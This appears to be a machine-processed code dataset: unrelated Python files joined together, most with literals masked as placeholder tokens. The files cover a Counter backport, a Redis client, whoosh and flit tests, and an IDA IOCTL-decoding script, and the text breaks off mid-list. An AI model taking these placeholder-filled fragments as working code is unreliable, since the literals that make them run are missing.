'<STR_LIT>' % name ) <EOL> if name [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> seen_names = set ( ) <EOL> for name in field_names : <EOL> if name . startswith ( '<STR_LIT:_>' ) and not rename : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> if name in seen_names : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> seen_names . add ( name ) <EOL> numfields = len ( field_names ) <EOL> argtxt = repr ( field_names ) . 
replace ( "<STR_LIT:'>" , "<STR_LIT>" ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> reprtxt = '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % name for name in field_names ) <EOL> template = '''<STR_LIT>''' % locals ( ) <EOL> for i , name in enumerate ( field_names ) : <EOL> template += "<STR_LIT>" % ( name , i , i ) <EOL> if verbose : <EOL> print template <EOL> namespace = dict ( _itemgetter = _itemgetter , __name__ = '<STR_LIT>' % typename , <EOL> OrderedDict = OrderedDict , _property = property , _tuple = tuple ) <EOL> try : <EOL> exec template in namespace <EOL> except SyntaxError , e : <EOL> raise SyntaxError ( e . message + '<STR_LIT>' + template ) <EOL> result = namespace [ typename ] <EOL> try : <EOL> result . __module__ = _sys . _getframe ( <NUM_LIT:1> ) . f_globals . get ( '<STR_LIT>' , '<STR_LIT:__main__>' ) <EOL> except ( AttributeError , ValueError ) : <EOL> pass <EOL> return result <EOL> class Counter ( dict ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> self . update ( iterable , ** kwds ) <EOL> def __missing__ ( self , key ) : <EOL> '<STR_LIT>' <EOL> return <NUM_LIT:0> <EOL> def most_common ( self , n = None ) : <EOL> '''<STR_LIT>''' <EOL> if n is None : <EOL> return sorted ( self . iteritems ( ) , key = _itemgetter ( <NUM_LIT:1> ) , reverse = True ) <EOL> return _heapq . nlargest ( n , self . iteritems ( ) , key = _itemgetter ( <NUM_LIT:1> ) ) <EOL> def elements ( self ) : <EOL> '''<STR_LIT>''' <EOL> return _chain . from_iterable ( _starmap ( _repeat , self . iteritems ( ) ) ) <EOL> @ classmethod <EOL> def fromkeys ( cls , iterable , v = None ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> def update ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> if iterable is not None : <EOL> if isinstance ( iterable , Mapping ) : <EOL> if self : <EOL> self_get = self . get <EOL> for elem , count in iterable . 
iteritems ( ) : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) + count <EOL> else : <EOL> dict . update ( self , iterable ) <EOL> else : <EOL> self_get = self . get <EOL> for elem in iterable : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> if kwds : <EOL> self . update ( kwds ) <EOL> def subtract ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> if iterable is not None : <EOL> self_get = self . get <EOL> if isinstance ( iterable , Mapping ) : <EOL> for elem , count in iterable . items ( ) : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) - count <EOL> else : <EOL> for elem in iterable : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) - <NUM_LIT:1> <EOL> if kwds : <EOL> self . subtract ( kwds ) <EOL> def copy ( self ) : <EOL> '<STR_LIT>' <EOL> return Counter ( self ) <EOL> def __delitem__ ( self , elem ) : <EOL> '<STR_LIT>' <EOL> if elem in self : <EOL> dict . __delitem__ ( self , elem ) <EOL> def __repr__ ( self ) : <EOL> if not self : <EOL> return '<STR_LIT>' % self . __class__ . __name__ <EOL> items = '<STR_LIT:U+002CU+0020>' . join ( map ( '<STR_LIT>' . __mod__ , self . most_common ( ) ) ) <EOL> return '<STR_LIT>' % ( self . __class__ . 
__name__ , items ) <EOL> def __add__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem in set ( self ) | set ( other ) : <EOL> newcount = self [ elem ] + other [ elem ] <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> return result <EOL> def __sub__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem in set ( self ) | set ( other ) : <EOL> newcount = self [ elem ] - other [ elem ] <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> return result <EOL> def __or__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem in set ( self ) | set ( other ) : <EOL> p , q = self [ elem ] , other [ elem ] <EOL> newcount = q if p < q else p <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> return result <EOL> def __and__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> if len ( self ) < len ( other ) : <EOL> self , other = other , self <EOL> for elem in _ifilter ( self . __contains__ , other ) : <EOL> p , q = self [ elem ] , other [ elem ] <EOL> newcount = p if p < q else q <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> return result <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from cPickle import loads , dumps <EOL> Point = namedtuple ( '<STR_LIT>' , '<STR_LIT>' , True ) <EOL> p = Point ( x = <NUM_LIT:10> , y = <NUM_LIT:20> ) <EOL> assert p == loads ( dumps ( p ) ) <EOL> class Point ( namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> __slots__ = ( ) <EOL> @ property <EOL> def hypot ( self ) : <EOL> return ( self . x ** <NUM_LIT:2> + self . 
y ** <NUM_LIT:2> ) ** <NUM_LIT:0.5> <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . x , self . y , self . hypot ) <EOL> for p in Point ( <NUM_LIT:3> , <NUM_LIT:4> ) , Point ( <NUM_LIT> , <NUM_LIT:5> / <NUM_LIT> ) : <EOL> print p <EOL> class Point ( namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> '<STR_LIT>' <EOL> __slots__ = ( ) <EOL> _make = classmethod ( tuple . __new__ ) <EOL> def _replace ( self , _map = map , ** kwds ) : <EOL> return self . _make ( _map ( kwds . get , ( '<STR_LIT:x>' , '<STR_LIT:y>' ) , self ) ) <EOL> print Point ( <NUM_LIT:11> , <NUM_LIT> ) . _replace ( x = <NUM_LIT:100> ) <EOL> Point3D = namedtuple ( '<STR_LIT>' , Point . _fields + ( '<STR_LIT:z>' , ) ) <EOL> print Point3D . __doc__ <EOL> import doctest <EOL> TestResults = namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> print TestResults ( * doctest . testmod ( ) ) </s>
<s> from flash . text . engine import ( TextElement , ElementFormat , FontDescription , <EOL> TextBlock ) <EOL> from graph import Colors <EOL> @ package ( '<STR_LIT>' ) <EOL> class Drawer : <EOL> def __init__ ( self , graph , sprite ) : <EOL> self . graph = graph <EOL> self . sprite = sprite <EOL> self . canvas = sprite . graphics <EOL> def color ( self , value ) : <EOL> if not value : <EOL> return <NUM_LIT:0> <EOL> if value . charAt ( <NUM_LIT:0> ) == '<STR_LIT:#>' : <EOL> return int ( '<STR_LIT>' + value . substring ( <NUM_LIT:1> ) ) <EOL> else : <EOL> return Colors . x11 [ value . toLowerCase ( ) ] <EOL> def draw ( self ) : <EOL> for node in values ( self . graph . nodes ) : <EOL> self [ '<STR_LIT>' + node . shape ] ( node ) <EOL> self . label_node ( node ) <EOL> for edge in values ( self . graph . edges ) : <EOL> self . draw_edge ( edge ) <EOL> def node_ellipse ( self , node ) : <EOL> if node . style == '<STR_LIT>' : <EOL> self . canvas . beginFill ( self . color ( node . color ) ) <EOL> else : <EOL> self . canvas . lineStyle ( <NUM_LIT:1> , self . color ( node . color ) ) <EOL> self . canvas . drawEllipse ( node . x - node . width * <NUM_LIT> , node . y - node . height * <NUM_LIT> , <EOL> node . width * <NUM_LIT> , node . height * <NUM_LIT> ) <EOL> if node . style == '<STR_LIT>' : <EOL> self . canvas . endFill ( ) <EOL> def node_circle ( self , node ) : <EOL> if node . style == '<STR_LIT>' : <EOL> self . canvas . beginFill ( self . color ( node . fillcolor ) ) <EOL> else : <EOL> self . canvas . lineStyle ( <NUM_LIT:1> , self . color ( node . color ) ) <EOL> self . canvas . drawCircle ( node . x , node . y , node . width * <NUM_LIT> ) <EOL> if node . style == '<STR_LIT>' : <EOL> self . canvas . endFill ( ) <EOL> def node_doublecircle ( self , node ) : <EOL> self . canvas . lineStyle ( <NUM_LIT:1> , self . color ( node . color ) ) <EOL> self . canvas . drawCircle ( node . x , node . y , node . width * <NUM_LIT> ) <EOL> if node . 
style == '<STR_LIT>' : <EOL> self . canvas . beginFill ( self . color ( node . fillcolor ) ) <EOL> self . canvas . drawCircle ( node . x , node . y , node . width * <NUM_LIT> - <NUM_LIT:4> ) <EOL> if node . style == '<STR_LIT>' : <EOL> self . canvas . endFill ( ) <EOL> def draw_edge ( self , edge ) : <EOL> self . canvas . lineStyle ( <NUM_LIT:1> , self . color ( edge . color ) ) <EOL> if self . startpoint : <EOL> self . canvas . moveTo ( edge . startpoint . x , edge . startpoint . y ) <EOL> self . canvas . lineTo ( edge . path [ <NUM_LIT:0> ] . x , edge . path [ <NUM_LIT:0> ] . y ) <EOL> else : <EOL> self . canvas . moveTo ( edge . path [ <NUM_LIT:0> ] . x , edge . path [ <NUM_LIT:0> ] . y ) <EOL> for i in range ( <NUM_LIT:1> , edge . path . length , <NUM_LIT:3> ) : <EOL> self . canvas . curveTo ( edge . path [ i ] . x , edge . path [ i ] . y , <EOL> ( edge . path [ i ] . x + edge . path [ i + <NUM_LIT:1> ] . x ) * <NUM_LIT:0.5> , <EOL> ( edge . path [ i ] . y + edge . path [ i + <NUM_LIT:1> ] . y ) * <NUM_LIT:0.5> ) <EOL> self . canvas . curveTo ( edge . path [ i + <NUM_LIT:1> ] . x , edge . path [ i + <NUM_LIT:1> ] . y , <EOL> edge . path [ i + <NUM_LIT:2> ] . x , edge . path [ i + <NUM_LIT:2> ] . y ) <EOL> self [ '<STR_LIT>' + edge . arrowhead ] ( self . color ( edge . color ) , <EOL> edge . path [ edge . path . length - <NUM_LIT:1> ] , edge . endpoint ) <EOL> def arrow_normal ( self , color , center , end ) : <EOL> dx = center . x - end . x <EOL> dy = center . y - end . y <EOL> s = <NUM_LIT> <EOL> c = <NUM_LIT> <EOL> ax = ( dx * c - dy * s ) * <NUM_LIT> <EOL> ay = ( dx * s + dy * c ) * <NUM_LIT> <EOL> s = - <NUM_LIT> <EOL> c = <NUM_LIT> <EOL> bx = ( dx * c - dy * s ) * <NUM_LIT> <EOL> by = ( dx * s + dy * c ) * <NUM_LIT> <EOL> self . canvas . beginFill ( color ) <EOL> self . canvas . moveTo ( end . x , end . y ) <EOL> self . canvas . lineTo ( end . x + ax , end . y + ay ) <EOL> self . canvas . lineTo ( center . x , center . y ) <EOL> self . canvas . 
lineTo ( end . x + bx , end . y + by ) <EOL> self . canvas . endFill ( ) <EOL> def label_node ( self , node ) : <EOL> font = FontDescription ( "<STR_LIT>" ) <EOL> format = ElementFormat ( font ) <EOL> format . fontSize = <NUM_LIT> <EOL> el = TextElement ( node . label or node . name , format ) <EOL> block = TextBlock ( ) <EOL> block . content = el <EOL> tl = block . createTextLine ( None , node . width * <NUM_LIT> ) <EOL> pos = node . label_pos <EOL> if not pos : <EOL> pos = node <EOL> tl . x = int ( pos . x - tl . width / <NUM_LIT:2> ) <EOL> tl . y = int ( pos . y + tl . height / <NUM_LIT:2> ) <EOL> self . sprite . addChild ( tl ) </s>
<s> import zmq <EOL> import MySQLdb <EOL> ctx = zmq . Context ( <NUM_LIT:1> ) <EOL> sock = ctx . socket ( zmq . REP ) <EOL> sock . connect ( '<STR_LIT>' ) <EOL> mysql = MySQLdb . connect ( host = '<STR_LIT:localhost>' , user = '<STR_LIT:test>' , db = '<STR_LIT>' ) <EOL> while True : <EOL> uri , = sock . recv_multipart ( ) <EOL> uri = uri . decode ( '<STR_LIT:utf-8>' ) <EOL> cur = mysql . cursor ( ) <EOL> cur . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , uri ) <EOL> cur . execute ( "<STR_LIT>" , uri ) <EOL> for row in cur : <EOL> nvisits = row [ <NUM_LIT:0> ] <EOL> sock . send_multipart ( [ ( uri + '<STR_LIT:U+0020>' + str ( nvisits ) ) . encode ( '<STR_LIT:utf-8>' ) ] ) </s>
import socket
import errno
from .core import gethub, Lock
from . import channel
from .util import setcloexec

# Per-class serializers turning each command argument into raw wire bytes;
# lookup is by the argument's exact class (no isinstance fallback).
convert = {
    str: lambda a: a.encode('<STR_LIT:utf-8>'),
    bytes: lambda a: a,
    bytearray: lambda a: a,
    int: lambda a: bytes(str(a), '<STR_LIT:utf-8>'),
    float: lambda a: bytes(repr(a), '<STR_LIT:utf-8>'),
}


def encode_command(buf, parts):
    """Append the wire encoding of one command (``parts``) to ``buf``.

    ``buf`` must support ``extend`` (a bytearray); the same object is
    returned so calls can be chained.  Raises KeyError when an argument's
    class has no entry in ``convert``.
    """
    add = buf.extend  # local aliases avoid repeated attribute lookups in the loop
    cvt = convert
    # Header carrying the number of parts, then one length-prefixed part each.
    add('<STR_LIT>'.format(len(parts)).encode('<STR_LIT:ascii>'))
    for part in parts:
        value = cvt[part.__class__](part)
        add('<STR_LIT>'.format(len(value)).encode("<STR_LIT:ascii>"))
        add(value)
        add(b'<STR_LIT:\r\n>')
    return buf


class RedisError(Exception):
    """Error reply received from the Redis server (raised or returned inline)."""
    pass


class RedisChannel(channel.PipelinedReqChannel):
    """Pipelined request channel speaking the Redis wire protocol over a
    non-blocking TCP or UNIX-domain socket."""

    BUFSIZE = <NUM_LIT>  # bytes requested per recv() call

    def __init__(self, host, port, unixsock, db):
        """Connect (non-blocking) and select database ``db``.

        ``unixsock``, when truthy, is a UNIX socket path and takes precedence
        over ``host``/``port``.
        """
        super().__init__()
        if unixsock:
            self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        else:
            self._sock = socket.socket(socket.AF_INET,
                socket.SOCK_STREAM, socket.IPPROTO_TCP)
        setcloexec(self._sock)
        self._sock.setblocking(<NUM_LIT:0>)
        try:
            if unixsock:
                self._sock.connect(unixsock)
            else:
                self._sock.connect((host, port))
        except socket.error as e:
            # Non-blocking connect reports EINPROGRESS; wait until writable.
            if e.errno == errno.EINPROGRESS:
                gethub().do_write(self._sock)
            else:
                raise
        self._start()
        db = str(db)
        # Select the database and require an OK reply before use.
        assert self.request('<STR_LIT>'
            .format(len(db), db).encode('<STR_LIT:ascii>')).get() == '<STR_LIT:OK>'

    def _close_channel(self):
        # Close the socket before letting the base class tear down state.
        self._sock.close()
        super()._close_channel()

    def sender(self):
        """Outgoing loop: drain pending requests into ``buf`` and write them.

        Retries on EAGAIN/EINTR; raises EOFError on a zero-byte send.
        """
        buf = bytearray()
        add_chunk = buf.extend
        wait_write = gethub().do_write
        while True:
            if not buf:
                self.wait_requests()
            if not self._alive:
                return
            wait_write(self._sock)
            for chunk in self.get_pending_requests():
                add_chunk(chunk)
            try:
                # NOTE(review): local name shadows the ``bytes`` builtin.
                bytes = self._sock.send(buf)
            except socket.error as e:
                if e.errno in (errno.EAGAIN, errno.EINTR):
                    continue
                else:
                    raise
            if not bytes:
                raise EOFError()
            # Keep whatever the kernel did not accept for the next iteration.
            del buf[:bytes]

    def receiver(self):
        """Incoming loop: parse replies off the socket and produce() them.

        The nested closures share a cursor into ``buf`` via the one-element
        list ``pos`` (a mutable cell, since the closures rebind its item).
        """
        buf = bytearray()
        sock = self._sock
        wait_read = gethub().do_read
        add_chunk = buf.extend
        pos = [<NUM_LIT:0>]

        def readmore():
            # Block (cooperatively) until at least one more chunk arrives.
            while True:
                wait_read(sock)
                try:
                    # Compact the buffer once the consumed prefix dominates it.
                    if pos[<NUM_LIT:0>] * <NUM_LIT:2> > len(buf):
                        del buf[:pos[<NUM_LIT:0>]]
                        pos[<NUM_LIT:0>] = <NUM_LIT:0>
                    bytes = sock.recv(self.BUFSIZE)
                    if not bytes:
                        raise EOFError()
                    add_chunk(bytes)
                except socket.error as e:
                    if e.errno in (errno.EAGAIN, errno.EINTR):
                        continue
                    else:
                        raise
                else:
                    break

        def readchar():
            # Next single byte (as int), reading more data if exhausted.
            if len(buf) <= pos[<NUM_LIT:0>]:
                readmore()
            c = buf[pos[<NUM_LIT:0>]]
            pos[<NUM_LIT:0>] += <NUM_LIT:1>
            return c

        def readline():
            # Bytes up to (excluding) the next CRLF; cursor skips past it.
            if len(buf) < <NUM_LIT:2> or pos[<NUM_LIT:0>] >= len(buf):
                readmore()
            while True:
                try:
                    idx = buf.index(b'<STR_LIT:\r\n>', pos[<NUM_LIT:0>])
                except ValueError:
                    pass
                else:
                    break
                readmore()
            res = buf[pos[<NUM_LIT:0>]:idx]
            pos[<NUM_LIT:0>] = idx + <NUM_LIT:2>
            return res

        def readslice(ln):
            # Exactly ``ln`` bytes, reading until enough are buffered.
            while len(buf) - pos[<NUM_LIT:0>] < ln:
                readmore()
            res = buf[pos[<NUM_LIT:0>]:pos[<NUM_LIT:0>] + ln]
            pos[<NUM_LIT:0>] += ln
            return res

        def readone():
            # Dispatch on the reply's type byte.  The constants are obfuscated
            # in this corpus but the five branches match the RESP type markers
            # (multi-bulk, simple string, error, integer, bulk) — TODO confirm.
            ch = readchar()
            if ch == <NUM_LIT>:
                cnt = int(readline())
                return [readone() for i in range(cnt)]
            elif ch == <NUM_LIT>:
                return readline().decode('<STR_LIT:ascii>')
            elif ch == <NUM_LIT>:
                # Errors are returned, not raised; callers decide what to do.
                return RedisError(readline().decode('<STR_LIT:ascii>'))
            elif ch == <NUM_LIT>:
                return int(readline())
            elif ch == <NUM_LIT>:
                ln = int(readline())
                if ln < <NUM_LIT:0>:
                    # Negative length encodes a null bulk reply.
                    return None
                res = readslice(ln)
                assert readline() == b'<STR_LIT>'
                return res
            else:
                raise NotImplementedError(ch)

        while True:
            self.produce(readone())


class Redis(object):
    """Lazy-connecting Redis client facade over :class:`RedisChannel`."""

    def __init__(self, host='<STR_LIT:localhost>', port=<NUM_LIT>, unixsock=None, db=<NUM_LIT:0>):
        self.unixsock = unixsock
        self.host = host
        self.port = port
        self.db = db
        self._channel = None          # created on first use
        self._channel_lock = Lock()   # guards channel creation

    def check_connection(self):
        """Create the channel on first use; re-checks under the lock so only
        one greenlet/thread constructs it."""
        if not self._channel:
            with self._channel_lock:
                if not self._channel:
                    self._channel = RedisChannel(self.host, self.port,
                        db=self.db, unixsock=self.unixsock)

    def execute(self, *args):
        """Send one command and block for its reply."""
        self.check_connection()
        buf = bytearray()
        encode_command(buf, args)
        return self._channel.request(buf).get()

    def future(self, *args):
        """Send one command and return the pending request (no blocking)."""
        self.check_connection()
        buf = bytearray()
        encode_command(buf, args)
        return self._channel.request(buf)

    def pipeline(self, commands):
        """Send several commands in one write; returns all replies."""
        self.check_connection()
        buf = bytearray()
        for cmd in commands:
            encode_command(buf, cmd)
        return self._channel.request(buf, len(commands)).get()

    def bulk(self, commands):
        """Run a transaction-style batch; presumably MULTI/EXEC — the guard
        literals are obfuscated here.

        Requires matching first/last commands, verifies the opening OK,
        raises any inline RedisError from the queued replies, and returns
        the final reply.
        """
        self.check_connection()
        if commands[<NUM_LIT:0>][<NUM_LIT:0>] != '<STR_LIT>' or commands[-<NUM_LIT:1>][<NUM_LIT:0>] != '<STR_LIT>':
            raise ValueError("<STR_LIT>")
        buf = bytearray()
        for cmd in commands:
            encode_command(buf, cmd)
        val = self._channel.request(buf, len(commands)).get()
        if val[<NUM_LIT:0>] != '<STR_LIT:OK>':
            raise RuntimeError(val, commands)
        for i in val[<NUM_LIT:1>:-<NUM_LIT:1>]:
            if isinstance(i, RedisError):
                raise i
            assert i == '<STR_LIT>'
        return val[-<NUM_LIT:1>]
<s> """<STR_LIT>""" <EOL> import vim <EOL> import vimp <EOL> def is_available ( ) : <EOL> """<STR_LIT>""" <EOL> for v in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if v in vimp . var : <EOL> return True <EOL> return False <EOL> def add_filetypes ( filetypes ) : <EOL> if isinstance ( filetypes , str ) : <EOL> ft = filetypes <EOL> elif isinstance ( filetypes , list ) : <EOL> ft = '<STR_LIT:.>' . join ( filetypes ) <EOL> vim . command ( '<STR_LIT>' + ft ) </s>
<s> import pathlib <EOL> import pytest <EOL> import requests <EOL> import responses <EOL> from unittest . mock import patch <EOL> from flit import upload , common , wheel <EOL> samples_dir = pathlib . Path ( __file__ ) . parent / '<STR_LIT>' <EOL> repo_settings = { '<STR_LIT:url>' : upload . PYPI , <EOL> '<STR_LIT:username>' : '<STR_LIT:user>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' <EOL> } <EOL> @ responses . activate <EOL> def test_register ( ) : <EOL> responses . add ( responses . POST , upload . PYPI , status = <NUM_LIT:200> ) <EOL> meta , mod = common . metadata_and_module_from_ini_path ( samples_dir / '<STR_LIT>' ) <EOL> with patch ( '<STR_LIT>' , return_value = repo_settings ) : <EOL> upload . register ( meta , '<STR_LIT>' ) <EOL> assert len ( responses . calls ) == <NUM_LIT:1> <EOL> @ responses . activate <EOL> def test_verify ( ) : <EOL> responses . add ( responses . POST , upload . PYPI , status = <NUM_LIT:200> ) <EOL> meta , mod = common . metadata_and_module_from_ini_path ( samples_dir / '<STR_LIT>' ) <EOL> with patch ( '<STR_LIT>' , return_value = repo_settings ) : <EOL> upload . verify ( meta , '<STR_LIT>' ) <EOL> assert len ( responses . calls ) == <NUM_LIT:1> <EOL> @ responses . activate <EOL> def test_upload ( ) : <EOL> responses . add ( responses . POST , upload . PYPI , status = <NUM_LIT:200> ) <EOL> with patch ( '<STR_LIT>' , return_value = repo_settings ) : <EOL> wheel . wheel_main ( samples_dir / '<STR_LIT>' , upload = '<STR_LIT>' ) <EOL> assert len ( responses . calls ) == <NUM_LIT:1> <EOL> @ responses . activate <EOL> def test_upload_registers ( ) : <EOL> with patch ( '<STR_LIT>' ) as register_mock : <EOL> def upload_callback ( request ) : <EOL> status = <NUM_LIT:200> if register_mock . called else <NUM_LIT> <EOL> return ( status , { } , '<STR_LIT>' ) <EOL> responses . add_callback ( responses . POST , upload . PYPI , <EOL> callback = upload_callback ) <EOL> with patch ( '<STR_LIT>' , return_value = repo_settings ) : <EOL> wheel . 
wheel_main ( samples_dir / '<STR_LIT>' , upload = '<STR_LIT>' ) <EOL> assert len ( responses . calls ) == <NUM_LIT:2> <EOL> assert register_mock . call_count == <NUM_LIT:1> </s>
from setuptools import setup, find_packages

# Distribution metadata gathered in one mapping and expanded into setup().
SETUP_KWARGS = dict(
    name="<STR_LIT>",
    version="<STR_LIT>",
    package_dir={'<STR_LIT>': '<STR_LIT:src>'},
    packages=["<STR_LIT>", "<STR_LIT>", "<STR_LIT>"],
    author="<STR_LIT>",
    author_email="<STR_LIT>",
    description="<STR_LIT>",
    long_description="""<STR_LIT>""",
    license="<STR_LIT>",
    keywords="<STR_LIT>",
    url="<STR_LIT>",
    zip_safe=True,
    test_suite="<STR_LIT>",
    classifiers=[
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
    ],
)

setup(**SETUP_KWARGS)
import unittest
from os import mkdir
from os.path import exists
from shutil import rmtree
# NOTE(review): ``query`` is imported but unused in this block.
from whoosh import fields, index, qparser, query, store


class TestQueryParser(unittest.TestCase):
    """Tests for whoosh's QueryParser: boosts, wildcards, escaping, and
    field names containing underscores."""

    def make_index(self, dirname, schema):
        # Create ``dirname`` if missing and open a brand-new index in it.
        if not exists(dirname):
            mkdir(dirname)
        st = store.FileStorage(dirname)
        ix = index.Index(st, schema, create=True)
        return ix

    def destroy_index(self, dirname):
        # Remove the on-disk index directory, ignoring a missing one.
        if exists(dirname):
            rmtree(dirname)

    def test_boost(self):
        # Boost factors and field names should be parsed per subquery.
        qp = qparser.QueryParser("<STR_LIT:content>")
        q = qp.parse("<STR_LIT>")
        self.assertEqual(q.subqueries[<NUM_LIT:0>].boost, <NUM_LIT>)
        self.assertEqual(q.subqueries[<NUM_LIT:1>].boost, <NUM_LIT:0.5>)
        self.assertEqual(q.subqueries[<NUM_LIT:1>].fieldname, "<STR_LIT>")
        self.assertEqual(q.subqueries[<NUM_LIT:2>].text, "<STR_LIT>")

    def test_wildcard(self):
        # Only the middle subqueries should parse as the wildcard class.
        qp = qparser.QueryParser("<STR_LIT:content>")
        q = qp.parse("<STR_LIT>")
        self.assertEqual(len(q.subqueries), <NUM_LIT:4>)
        self.assertNotEqual(q.subqueries[<NUM_LIT:0>].__class__.__name__, "<STR_LIT>")
        self.assertEqual(q.subqueries[<NUM_LIT:1>].__class__.__name__, "<STR_LIT>")
        self.assertEqual(q.subqueries[<NUM_LIT:2>].__class__.__name__, "<STR_LIT>")
        self.assertNotEqual(q.subqueries[<NUM_LIT:3>].__class__.__name__, "<STR_LIT>")
        self.assertEqual(q.subqueries[<NUM_LIT:1>].text, "<STR_LIT>")
        self.assertEqual(q.subqueries[<NUM_LIT:2>].text, "<STR_LIT>")

    def test_fieldname_underscores(self):
        # End-to-end: index two documents and search on an underscored field.
        s = fields.Schema(my_name=fields.ID(stored=True), my_value=fields.TEXT)
        ix = self.make_index("<STR_LIT>", s)
        try:
            w = ix.writer()
            w.add_document(my_name=u"<STR_LIT>", my_value=u"<STR_LIT>")
            w.add_document(my_name=u"<STR_LIT>", my_value=u"<STR_LIT>")
            w.commit()
            qp = qparser.QueryParser("<STR_LIT>", schema=ix.schema)
            # NOTE(review): ``s`` is rebound here from the schema to the
            # searcher — confusing but harmless.
            s = ix.searcher()
            r = s.search(qp.parse("<STR_LIT>"))
            self.assertEqual(r[<NUM_LIT:0>]['<STR_LIT>'], "<STR_LIT>")
            s.close()
            ix.close()
        finally:
            # Always clean up the on-disk index, even on failure.
            self.destroy_index("<STR_LIT>")

    def test_endstar(self):
        # A trailing-star term should parse to the expected query class.
        qp = qparser.QueryParser("<STR_LIT:text>")
        q = qp.parse("<STR_LIT>")
        self.assertEqual(q.__class__.__name__, "<STR_LIT>")
        self.assertEqual(q.text, "<STR_LIT>")

    def test_escaping(self):
        # NOTE(review): this test body appears truncated — it only builds the
        # parser and asserts nothing.
        qp = qparser.QueryParser("<STR_LIT:text>")


if __name__ == '<STR_LIT:__main__>':
    unittest.main()
# Package public API: re-export the client, the models, and the geolocation
# helpers so callers can import them from the package root.
from .client import UberClient, UberException, UberLocationNotFound
from .models import *
# NOTE(review): "GeolocationExcetion" looks misspelled ("Excetion"), but the
# name must match whatever .geolocation actually defines — verify there
# before renaming, since this import would fail otherwise.
from .geolocation import geolocate, GeolocationExcetion
<s> """<STR_LIT>""" <EOL> import sys <EOL> import idc <EOL> import idaapi <EOL> def winio_decode ( ioctl_code ) : <EOL> """<STR_LIT>""" <EOL> access_names = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> method_names = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> device_name_unknown = '<STR_LIT>' <EOL> device_names = [ <EOL> device_name_unknown , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> device_name_unknown , <EOL> device_name_unknown , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' 